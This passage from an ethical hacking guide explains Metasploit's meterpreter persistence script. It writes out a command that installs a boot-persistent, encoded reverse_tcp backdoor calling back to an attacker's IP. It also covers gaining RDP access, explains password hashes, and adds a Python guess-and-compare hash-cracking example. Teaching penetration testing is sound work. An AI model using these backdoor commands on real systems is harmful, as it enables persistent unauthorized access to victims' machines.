Ethical Hacking and Penetration Testing Guide




Persistence
The Metasploit framework has two different types of backdoors built into it, namely, Metsvc and persistence. In this section, we will talk about persistence, which is a built-in meterpreter script that automates the backdooring process: it uploads the payload and makes it persistent for us. We can view its options by typing the following command from the meterpreter console:

meterpreter> run persistence -h

To execute this script we use the following command:

meterpreter> run persistence -X -i 5 -p 4444 -r 192.168.75.144

The command would listen for all the connections on port 4444 on our local host 192.168.75.144. The argument -X instructs the backdoor to start automatically as soon as the system boots. The -i parameter indicates the number of iterations that the payload would be encoded, which in this case is 5, since the script also does the encoding for us. The default encoder used is shikata_ga_nai.

From the output we can see that the script automatically creates a payload windows/meterpreter/reverse_tcp and sets the registry value. When the victim turns his system off, you would notice that our meterpreter session has died, and as soon as he reboots his computer we will have our meterpreter session back due to our persistence script.
So far you have learned about various backdoors and how they can be made persistent. Now we move deeper into the maintaining-access phase of post-exploitation and discuss another approach that could be used to maintain access on our target machine. The approach involves getting access to services such as Telnet, VNC, and RDP. It is not the stealthiest approach, as the network administrator might notice it, but sometimes it can get past them, and it is great for a proof of concept in your penetration testing reports.
RDP (Remote Desktop) is one of the services that we would encounter most of the time; let's discuss some of the scenarios you might encounter:
1. It requires a password.
2. Remote desktop access is disabled and you need to re-enable it.
3. Our current user is not allowed to access the remote desktop.
So the first step requires us to obtain hashes. Before getting into how to obtain hashes, let's see what they are.
What Is a Hash?
Passwords are stored as either plain text or their hash values inside a filesystem or a database. A hash is basically a one-way cryptographic algorithm; the thing about a hash is that it's irreversible, which means that once a plain text password is passed through a hashing algorithm it cannot be returned to its original state. The only way of recovering it is by guessing the word, running it through the same hashing algorithm, and then comparing the result with our original hash. This is the process that is used to crack a password hash.
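The guess-hash-compare loop described above, written out as an added example (not code from the book): a stored hash is never inverted, only matched against the hash of each candidate word. The algorithm name, the stored hash and the small wordlist are constructed for the demonstration.

```python
import hashlib
import hmac
from typing import Iterable, Optional


def hash_password(plain: str, algorithm: str = "sha256") -> str:
    """One-way step: plain text in, fixed-length hex digest out.

    There is no inverse function; the digest alone does not reveal
    the password, which is the property the section describes.
    """
    return hashlib.new(algorithm, plain.encode("utf-8")).hexdigest()


def crack_by_guessing(target_hash: str, candidates: Iterable[str],
                      algorithm: str = "sha256") -> Optional[str]:
    """The only route back to the plain text: hash every guess with the
    same algorithm and compare it with the stored hash.

    Returns the candidate that produced the stored hash, or None when
    nothing in the wordlist matches (a hash cannot be "decoded").
    """
    for guess in candidates:
        # compare_digest is a constant-time comparison, so the check
        # itself does not leak how many leading characters matched.
        if hmac.compare_digest(hash_password(guess, algorithm), target_hash):
            return guess
    return None


# Constructed sample data: the "stored" hash of a made-up password and
# a tiny wordlist of the kind a cracking tool would iterate over.
STORED_HASH = hash_password("Summer2013")
WORDLIST = ["password", "letmein", "Winter2012", "Summer2013", "admin"]

if __name__ == "__main__":
    print("stored hash:", STORED_HASH)
    print("matched:", crack_by_guessing(STORED_HASH, WORDLIST))
    print("no match:", crack_by_guessing(STORED_HASH, ["qwerty", "123456"]))
```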